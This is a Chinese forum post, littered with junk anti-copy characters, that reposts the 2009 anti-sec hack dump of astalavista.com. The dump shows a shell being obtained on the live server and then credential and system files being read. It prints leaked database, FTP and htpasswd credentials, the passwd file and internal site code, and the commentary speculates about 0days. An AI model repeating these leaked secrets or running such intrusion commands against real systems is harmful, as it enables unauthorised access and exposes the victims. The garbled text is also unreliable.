里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。- I d8 G: O0 P# q9 L) ^- _; _0 F
2 @( U# o& o( ?2 Q[root@front3 ~]# curl -I litespeedtech.com
1 j: ~; T6 s& I' n# I4 mHTTP/1.1 200 OK
& Q/ |6 }6 C6 {% }$ m1 C3 i8 dDate: Fri, 05 Jun 2009 22:54:51 GMT* |3 f4 ?2 g* J' P$ H
Server: LiteSpeed1 D) A: u; L1 M; f I' f' m
; u; C% Q7 B& @7 I: g2 Y% t6 z5 {$ c3 r
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-0 n5 C6 p* d9 l/ u v6 j& Z1 f N
9 E' P: u% j, F3 ~# g有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
3 x# o9 x4 M, N4 L( f- [" W8 }% t! G; S0 p
; N* w; t* p9 o* X1 s7 q/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ - e) u# V( @5 q: j: \7 B$ m2 I4 C# k
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
# g/ F* }; M$ y' L1 q8 M1 \/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
+ g9 Q3 _ u8 ^; y* N% E7 i\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /8 ^0 P1 @" f. j& C& r ?; C9 Y3 h# D
\/ \/ \/ \/ \/ \/ \/3 L- k9 W/ j6 b, V+ p
The Hacking & Security Community: V$ c+ W9 P5 V
[+] Founded in 1997 by a hacker computer enthusiast
- V$ z% q! r& L$ D* g) F[-] Exposed in 2009 by anti-sec group
. w6 y& l% T! _, b, Z+ J
4 R4 b9 G, A5 x$ T9 T! c, B3 ^From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
1 p# B+ g" R5 e>> 03. Who’s behind the site?
9 _9 I9 f% X/ |$ X$ E2 x- l Q>>. n4 h- w3 S* S( p. u5 T. _! M
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
8 C1 Z. Z6 S1 T% {0 S2 C& g$ S5 k5 p, N/ {& D% [
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?& I6 h+ i+ }' W+ L+ {' L' q
>>, U3 K5 k6 q$ f/ j D; `- p) T
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and( @& e( b$ E4 F
military institutions.7 o* \8 n5 `4 Q
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
9 n0 d$ q' k' K; ~8 s. m2 L2 Z+ G7 }) y! G7 v) D
Why has Astalavista been targeted?) }5 |7 v2 r! n9 X3 f9 W- q
: Y+ K3 a! F: _% }5 u. BOther than the fact that they are not doing any of this for the “community” but, T$ P) b4 z) q t1 Z+ |4 J# w
for the money, they spread exploits for kids, claim to be a security community
- f5 \% a! n, P% e(with no real sense of security on their own servers), and they charge you $6.66
+ R% b& s* R$ M; @5 g! Gper months to access a dead forum with a directory filled with public releases) o! O" v/ O# B) p' A6 |
and outdated / broken services.7 H2 t' F0 D8 ~$ E7 \
% Y/ O1 h1 U2 M3 Z, C) H, r% O
We wanted to see how good that “team of security and IT professionals” really is.4 ~) K7 t9 x3 E0 `+ V' r8 a
" V5 y+ d& y) W$ P; n
Let’s begin.
! m3 P: Q3 K4 q6 C. j# R& @/ ?0 {, C
+ V, t' p) i' a9 }* f# Ranti-sec:~# ./g0tshell astalavista.com -p 80
! E2 y c u2 k[+] Connecting to astalavista.com:80* Q! Y) ~7 a' t$ F7 f, l; B
[+] Grabbing banner…/ J& l' U3 v) _3 T G: Y+ \# V
LiteSpeed
; d. O1 Z/ ?! c: m% r[+] Injecting shellcode…& U: m! H! @5 n
[-] Wait for it, z$ D/ L. j1 T& Y) Y2 g A1 W" [4 A/ L
- S# z$ G1 P* B# b[~] We g0tshell9 u( z+ G3 L( p
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux, y- z6 |3 d2 a) i' b1 P6 g+ t
ID: uid=100(apache) gid=500(apache) groups=500(apache)
" g7 h5 U( r# M: s* [5 V6 Q
5 x6 w" [, E: @3 Csh-3.2$ cat /etc/passwd; P6 M8 `: o8 [% A' I7 F* D
root:x:0:0:root:/root:/bin/bash- x7 U V7 f- q+ B/ ~/ ?( m6 ?
bin:x:1:1:bin:/bin:/sbin/nologin
: Y, H, ?8 H8 j" T4 fdaemon:x:2:2:daemon:/sbin:/sbin/nologin) q; w- h: M' o; `" B
adm:x:3:4:adm:/var/adm:/sbin/nologin
" l) [3 N8 y# r7 ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
. ?; ^! N* i& b1 k+ nsync:x:5:0:sync:/sbin:/bin/sync" H2 z2 j) V0 Q% W$ \
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
4 R: @6 R$ E: G+ {7 P+ }' ohalt:x:7:0:halt:/sbin:/sbin/halt9 i2 j0 P" j: }. V( n: g2 y
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
4 R" K2 w' U& Z& u( j; E* Tnews:x:9:13:news:/etc/news:9 @/ N/ G- Y9 G, A3 y
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin' R6 I( H5 N5 W# J/ @+ c# l) i- r
operator:x:11:0 perator:/root:/sbin/nologin# b [! B! B; J
games:x:12:100:games:/usr/games:/sbin/nologin) V# M3 d7 Z O& \
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
B# x: Z& k0 ?! tftp:x:14:50:FTP User:/var/ftp:/sbin/nologin. Y$ `* }5 F6 \
nobody:x:99:99:Nobody:/:/sbin/nologin- \! \0 o9 d% S; O/ Q
rpm:x:37:37::/var/lib/rpm:/sbin/nologin. m) N [9 g# ?* Q* G
dbus:x:81:81:System message bus:/:/sbin/nologin* E: C! h5 ~- C$ ] @) @. e3 R/ t) O
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin, T) s) [ i0 B* n" ^
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin( c2 t" w+ Y+ }
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
# E& ?9 |2 {5 k& y/ j& w/ evcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
! a: ]6 g' \2 D' Qhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
' u8 [9 F- [9 m$ h. Grpc:x:32:32 ortmapper RPC user:/:/sbin/nologin% Z" @) K8 b, j) X; {; Y
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin6 R Y6 O( I; `' U5 C! v& J) W
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin! ^: X; u4 |6 @4 V( `
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
5 q C1 C- t. M, G" s! Z2 d% h" Dpcap:x:77:77::/var/arpwatch:/sbin/nologin+ A4 a$ }; B1 g7 E. D
named:x:25:25:Named:/var/named:/sbin/nologin% f' q$ k4 V( k: b
apache:x:100:500::/var/www:/bin/false$ H8 s0 ]' U* j! w6 O
diradmin:x:101:101::/usr/local/directadmin:/bin/bash7 e# T+ c9 O I" d; B8 v
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash) t3 z) n4 X# u( A- J6 p/ N
webapps:x:500:501::/var/www/html:/bin/bash j& K" s9 M0 M h5 S! G
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- o8 k, |* O3 @1 c, d( Padmin:x:501:502::/home/admin:/bin/bash
3 J* l1 z3 c8 s% }jon:x:502:503::/home/jon:/bin/bash
9 j) X) D: X5 o1 _" lcom:x:503:504::/home/com:/bin/bash3 e7 A& m1 J2 }3 l5 C
ntp:x:38:38::/etc/ntp:/sbin/nologin
4 u8 _8 J$ c+ ?; {. g+ B) {. ^ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
8 f7 j) y" t- R$ dastanet:x:504:505::/home/astanet:/bin/bash
6 C+ p0 o# J- z; g! g( l( Eavahi:x:70:70:Avahi daemon:/:/sbin/nologin" O- H3 D# a, ]) t" H- U; k
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
: p2 f& D: s W
5 A- [, ^$ ^" K' b' Ash-3.2$ cat /etc/hosts
& J: N' ]9 {! N1 [6 r) @% i# Do not remove the following line, or various programs0 r& Q& j; {& T* K& H
# that require network functionality will fail.( Y& y8 b- {5 g
127.0.0.1 localhost.localdomain localhost$ q# E" X* l* C1 U
::1 localhost6.localdomain6 localhost6% L2 ]0 u, F% A7 |. F3 m% B8 y# S
80.74.154.172 asta1.astalavistaserver.com- W! p. G; I8 f) F2 _
2 d4 Y* L$ W- m/ P
sh-3.2$ pwd& c! X6 ]7 `" c: u z( j1 {0 i
/home/com/public_html
) ?& \+ r% c; H
- P% t! L/ B h o* p4 A0 G- Lsh-3.2$ ls -la" B7 H! c& {- h- W) d& Z
total 18460
% j5 Q( G9 E+ Fdrwxr-xr-x 30 com apache 4096 May 28 17:06 .' D- t, Y S/ E5 K
drwx–x–x 11 com com 4096 Jun 25 2008 ..
4 T5 p+ M) }4 W! S- _( Pdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin3 X8 w! M9 P" [. }% G& R& K, v
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" u$ @4 e3 L0 q z. l
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin9 F! `& }- T! o
drwxrwxrwx 2 com com 4096 May 19 00:50 config
5 y4 P3 b3 y$ Y" S7 g2 ?4 ndrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
2 g5 ~" Z q# Cdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
2 l4 M, U* e; ?9 t3 K" |drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing) a) D: X; h! d! z
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo. V6 f6 M/ X& A& E, K5 _" @
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
* ^; e+ j+ R1 {+ e-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php$ H& v' Y- p' Q& b* ^8 F' `; [
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd V6 g3 l" S. \2 Q9 S
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor( v% D- F7 I( B( u
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
0 A2 O7 T0 v$ l$ \5 Fdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed' M0 o3 @" v9 h4 W6 H* N
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
* V- @3 s: E$ k-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
6 ?. d* k7 g; w* P; L. ^( m- k-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
h. [ t& u7 x1 ?/ A9 y) r+ Ldrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
0 I' k/ s( X0 a2 c' O( p" j2 cdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images- v/ @" D; J( o o$ A0 W+ {
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php0 z1 N+ P, z3 [. j8 g
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
. E2 S% L1 h) ^/ _ kdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang/ U" b* O; ^3 m4 N# W+ r
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib. k/ }8 F4 a/ \* I5 ^1 b
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
6 b9 ~& y- b9 S# ^7 t: \, Udrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
' Z8 q% C D* H3 Q7 t Jdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
* M4 `4 _, o8 X2 N7 K. c8 Rdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin$ K. s. U( j" A9 [0 P5 W" { ?
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
* R* Y4 G( t9 _2 o. u, vdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
+ l: s/ O% M( p+ Adrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
! N9 o5 S* X3 [# t( bdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
8 M% @( x2 a7 q/ U+ |0 g; b-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt; ^1 D/ `( l$ N$ V# Y2 d1 F8 s( h
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
) m) x& E f$ f+ Q-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
9 W; g/ y! ~0 sdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
0 @1 A' K2 ]8 p" z' ? Ddrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
c4 O- H }7 h. c( Y" Udrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
2 o* n+ \3 n0 [5 z
* M/ {8 p Y9 m1 x2 ?* E+ S msh-3.2$ head -20 index.php
1 H5 J% Y! A, P<?php6 g& \2 Z& J& G( }
5 v# h( ~6 ~3 S' d0 H7 ~$ m
/**
* T( P5 p& f6 |3 W( W2 u6 I* The main page for the CMS, H' N4 @# v7 z; o
* @copyright CONTREXX CMS - COMVATION AG3 S) ]' N9 h6 W' t/ f
* @author Comvation Development Team
$ y7 {9 {& f0 u& [$ W, b' T- i* @version v1.0.9.10.1 stable
- f9 y; C/ ^* h( G$ P. L" n" V* @package contrexx
( g9 y8 r! T7 e+ J5 H2 Q* @subpackage core
9 a) v3 s' R3 J3 Z* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage) a& `. p3 ]1 E
* @since v0.0.0.0% \& @' r1 Z, Q. _; E. s( J
* @todo Capitalize all class names in project2 c L/ S" A( N
* @uses /config/configuration.php
+ C6 Q" e! w' x3 r* @uses /config/settings.php
0 h B3 t3 y7 d8 S, v! t* @uses /config/version.php2 X9 l" t/ N8 T! Z
* @uses /core/API.php
$ e0 ^7 k& G- H: n( T6 m* @uses /core_modules/cache/index.class.php" a9 Y5 N+ g6 p" m/ t3 q1 U
* @uses /core/error.class.php' i# T8 T, J G1 W0 p
* @uses /core_modules/banner/index.class.php$ o: ^. \3 [2 A8 ]* B4 v
* @uses /core_modules/contact/index.class.php
8 n0 p. R5 [% a1 s% R
; r! h6 a. U# x% t2 R% Ssh-3.2$ cd config/' {- Y. P3 g$ }: t8 k; C
sh-3.2$ ls -la# v+ n3 K7 p+ y$ [
total 32
& ]2 X4 I% `, d- u0 U! L1 Odrwxrwxrwx 2 com com 4096 May 19 00:50 .. c9 G* b# h- F& U! J% E. ^
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..+ G' o" v) O5 A& @: {" k
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
- P- [# i h% i) N-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
8 f, F/ k& k6 o' E$ g5 B-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php& Z4 U5 s8 _; s: J/ v6 ]# U
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
2 ~; {4 p) E! t0 J! u. _6 s; \8 j" V1 g C0 m; c# {1 u
sh-3.2$ cat configuration.php+ `+ y% }8 o# P3 l3 s
[snip]6 {3 \0 {2 L4 s2 T$ j: \
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost; B1 L7 t2 X' ~( {: Y
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
1 L5 y* p( ] \$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
$ P% o/ P9 N' a) w/ _" v' f$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
+ |& M c( m& L$ c7 Y' ]$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password* a3 x' p( m9 k4 V: I6 g* k
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)* @& |; c+ ^9 h+ v: l% P
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
0 C$ Q6 q2 ^% Y5 Y9 N) u[snip]
( s% M3 w8 b/ J# o) x6 G$_FTPCONFIG['is_activated'] = true; // Ftp support true or false$ v! P- r) L! q1 C& N3 s. f6 u* P
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode1 l( n0 L. Z" H
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
- v+ R4 {; g# T" o( \$_FTPCONFIG['port'] = 21; // Ftp remote port3 z$ ]6 K+ e/ c3 L* q5 }8 w
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username# D2 H1 ^. x7 V m% C+ ^1 e
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password% J: S: D9 E6 ~; E! {2 L' j
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms; `/ m/ `2 r6 T
: b3 c: y6 @" \. b
sh-3.2$ cd ..) x. L3 u+ Q; G8 f G
sh-3.2$ cd dvd/: F# N$ n8 j/ D: ?) O
sh-3.2$ ls -la' Q" r. K- B/ }) q; n3 M' h
total 2913780% J1 Q P4 ~- v8 m+ G+ F9 f4 C
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
2 K$ B b! ?/ ?7 Vdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 `6 K5 [5 V( V# X
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
: A7 |1 l6 L% r! l( H) t/ m; E-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar" u& S! u: n: r7 S7 S
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
8 t. ~9 r" C9 V- N2 S4 l& g% H-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess& T& _3 ~$ { n8 w- j7 H
0 T) o7 U' Y9 |! z1 E
sh-3.2$ cat .htaccess
% _ _8 ~0 A$ S3 {# R$ z' n! q4 E5 I, SauthType Basic
/ v7 @9 u9 R/ D3 D: N4 l0 Z9 sauthName DVD# W4 B1 t H3 K( u& ~2 y3 N2 K
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- r& Z! S5 R* X) N- g9 G5 `require valid-user
4 X% h, r9 F9 j8 H$ E+ ?7 m: V: v- v& t3 K* X! H0 _
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
6 H4 ^7 n* G% i4 {8 Z5 H! o2 k8 DDVDdownload:CRD8cuY6.MPT69 v- c/ f' G2 u, L% X
DVDdownload2:CR8a36.wluFMg
2 c( L- } o1 ^# N! p
- C# K2 T5 N+ h+ o4 ^7 [+ n+ e* I& C& ash-3.2$ cat test.php
( i8 |) c+ U; V w" D<?php
+ R4 s% z& {, ]$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;1 q4 _* g1 P7 W: u6 t; C+ d4 Q
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
' K6 W$ I; @/ f, A" V. `8 ?echo $url;
0 S3 W+ |$ `' n6 O' g7 A/ T9 w?>* R7 l$ M- [" h* J# w
/ B( a/ E. `: w* qsh-3.2$ cd modifications/0 ^3 A$ R8 }. u- V7 l
sh-3.2$ ls -la
1 S9 H8 `& P! D$ btotal 32( X c5 S! I! m- [. t, x8 ]: ~
drwxr-xr-x 8 com com 4096 May 11 12:48 .- L5 A, J, B1 {. b/ z& D( v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ N A, K( [* edrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng9 ~' ]! E. p) P' [6 a3 ^- P
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs6 V% G4 k2 u) `1 w4 T; w1 u
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
( \; \9 N# Q& _) }/ y5 r! Z( n2 Hdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
8 a. s3 c0 @+ P& b7 `( edrwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 O" H5 }) Q5 p3 k6 }7 U% J% l
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp0 D/ L0 ?9 d- @$ a5 B
5 e# X3 H" H$ ~5 Y' w, E9 w' s& [
sh-3.2$ ls -R
; G3 f1 T6 Z/ y! C' m) V.:
9 j6 _3 F* @% |! gcom_avtng cronjobs onlinetools pjirc search _tmp* y4 g+ [1 m I5 Z9 J; a* v
$ B; q5 [& _) {4 x4 M3 x3 x& ^./com_avtng:( @' H9 ?% M3 I8 v/ Q
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
/ E8 A) T% r. \
r1 r+ b d. v4 I4 ~' _./com_avtng/scripts:
7 J+ b1 Z+ K' m" \2 i) F# ~ J# qpopunder.js
1 D" T4 G! p: o1 ~3 G6 f3 q& E9 M+ P p" C; V
./cronjobs:+ t1 N3 T! P4 u) z* [. I4 H
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
+ o. h9 b- x( _- T& P, a# X7 o7 B! |0 V/ }: r8 l ^3 d7 m
./cronjobs/tmp:9 I) K5 _' I4 k) q- d1 O
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
- l9 \3 p6 r- b1 c9 I4 Y
, p. R' r' x& b5 J./onlinetools:
1 m; X+ N% K# a% K3 K0 ^3 \index.php
4 z6 a6 T/ R- M1 Q! Y c2 a8 `+ ?. [
9 o# o; N) B- B3 P" C./pjirc:
5 t/ A6 p% k3 q: a# a2 j% ta_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
) A2 x) j$ e$ g" Q4 eAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
3 c4 m( C& z! l2 ?0 k9 |background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
0 s# `1 W4 d) c8 q7 H3 ^1 ^) w9 K$ T# i8 \3 L" I
./pjirc/img:7 f3 X9 {0 c$ x! E& a" Z& u0 ?
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif3 X1 f+ \+ L* W
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
; w4 k8 x* ]) n' t; Nverre-eau.gif7 m' I. w! K+ k& [! \9 P
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif i5 }6 c8 g* ~: _8 A! ]
verre-vin.gif; k/ P" f5 k, ?; n2 m! U" u! O
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
1 r2 [. S2 d3 q0 fbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif) |! ?* @5 G; M
1 ~2 \# V# C6 e9 ~. \./pjirc/snd:
& e7 d, Z/ I' l: C( |& Jbell2.au ding.au' }1 f1 k% w5 O- d
2 j: K4 h# e& ~3 ]
./search:
; G8 F# P% O$ D. t0 gsearchEngines.php search.php% b& t' O& C) f+ `% K7 j
+ J) [+ W, \0 j/ R" _/ N- P& O6 e
./_tmp:
" ] z' [* V3 Y" W) O2 idefaultPorts.php defaultPorts.txt
9 g8 t2 m- }$ I, X. S
U! R2 u' w# r" bsh-3.2$ cd cronjobs/
7 @+ d9 G, @5 ~8 L8 }sh-3.2$ cat exploits.php5 b5 T7 I, I; _9 ^1 w! X) z
[snip]
e% R! [/ w) E9 q) Q' b( s' |$categories = array();9 ]: T% C4 j" O, X' A' _2 a
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’; c) C- S5 j, f2 T- r7 Z4 g3 A
$expolits = file($milw0rmFile);7 M% L. j7 V2 J8 K( S5 |
$comExploits = array();
5 Q& f& j& ]8 H[snip]
: [6 G6 K* @2 f4 A// manage data5 i1 n+ U6 q- x8 Y
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640; X* B1 j* @/ Y1 V; K
y0 m- T9 N& l+ h" ?% f- B // get path and title
# Q+ L: j: v3 e0 S( { $expolits[$x] = trim($expolits[$x]);
: z' d% p. k9 l/ o, l4 J ? $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));+ P- Y& \( L9 a/ c1 }* s+ e
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);1 V; a6 I: S/ N5 T( e, x! t; V; @
/ @8 i8 b8 {, ~4 B u3 Z
// check if file exists: U- S4 G* Y' }/ Y# m6 M4 v
if (file_exists($path)) { r2 V& y1 l, ^- q" ~ Z9 U
$ q; Y# F# A1 K& P! G( T $text = file_get_contents($path);
: ~+ u. |3 n1 L8 C! Q2 H1 B2 V; C3 N. o' b7 [( B7 o' ]
// get content and date
" y$ h3 g9 f; E& n //$text = htmlspecialchars($text, ENT_QUOTES);
0 o2 `& n* U6 J $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));- M5 p. C" v9 V* m9 \8 w% K- n
if ($tmptext != ”) {6 W& x" I6 `9 J: J+ a9 e, g
$text = $tmptext;4 \* e: g/ Q' f6 {, W6 b: i
} else {& e* _6 M M8 w5 R
$text = addslashes(htmlentities($text, ENT_QUOTES));8 v: H% P& X1 Q; X) `+ R; v
}6 H" H% ~" K: ^; c( l
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
9 t E0 r- r* [" U3 k2 ? $tmp = explode('-', $date);
, ~0 a9 x& M9 p $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
4 c! Q4 o3 T9 f8 h6 \; P! F$ ~4 { $cat = getCategory ($path);2 T9 p( z: D. P4 U: J
$ext = pathinfo(basename($path));
( b \4 t7 m% K6 H, W; `2 Z $ext = $ext['extension'];
( e n9 i1 I: E) k+ l2 q1 n+ ~2 T( e $qStr = ”& m2 w8 w/ T: }9 |! u% Z4 |
SELECT `id`/ X4 k- A3 V1 d0 ?5 D/ Q
FROM `contrexx_module_exploits`
& N0 Y: i# b7 i WHERE `title` = ‘” . $title . “‘
8 k6 P. ^! o* n8 \ AND `date` = ‘” . $date . “‘: X2 D" p) C) R4 F/ u5 T
“;
) o9 V7 y8 e# W4 p echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
6 A! }, n5 k- J. N+ V- ?0 Y $q = $_objDB->query($qStr);
" E/ T( x r# f0 s, P% u7 A
3 m$ P8 g0 x- h0 Y& t& R if ($q->numRows() == 0) {
; g5 C1 b: P7 c4 I' |2 d9 K
* M) j! I6 m% h0 R) r# A, w // prepare array9 v$ R. j% E# D) Q
$comExploits[$x]['date'] = $date;
, B4 _) p3 _4 @" C $comExploits[$x]['title'] = $title;
, a c$ l& W8 W4 b4 m $comExploits[$x]['author'] = ‘milw0rm’;
5 x4 j# R. U* _0 @8 J/ { $comExploits[$x]['text'] = $text;9 p/ s$ h# d" {
$comExploits[$x]['source'] = $ext;9 ~4 y7 k; H, W ^2 s8 [* O$ g- I
$comExploits[$x]['url1'] = ”;
3 M1 b* s) \3 D8 e $comExploits[$x]['url2'] = ”; s0 L7 q4 a+ E) z
$comExploits[$x]['catid'] = $cat;
/ r0 M2 m! M K6 A $comExploits[$x]['lang'] = ‘2′;
% v9 [0 @ c, `: v& D: C2 H& F: V+ Z $comExploits[$x]['userid'] = ‘12′;0 S3 H+ |3 C9 ~( Y( B
$comExploits[$x]['startdate'] = ‘0000-00-00′;
) N) L- C% A9 ?( W. `0 ` $comExploits[$x]['enddate'] = ‘0000-00-00′;# T$ n, R- ~: A/ O* ]8 }; z
$comExploits[$x]['status'] = ‘1′;
+ s: t* C7 K3 @1 C9 o% i# c1 K $comExploits[$x]['changelog'] = $date;
" U" ^2 K% p9 a' a5 U6 t+ I# }, j5 c) {$ Z2 ^( e) O) ]
}6 A' i# _8 ?" C/ U9 b) \" `
[snip]
c8 U6 O; Q; |. h $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>! S b" N: R3 A# F
<rss version=”2.0″>
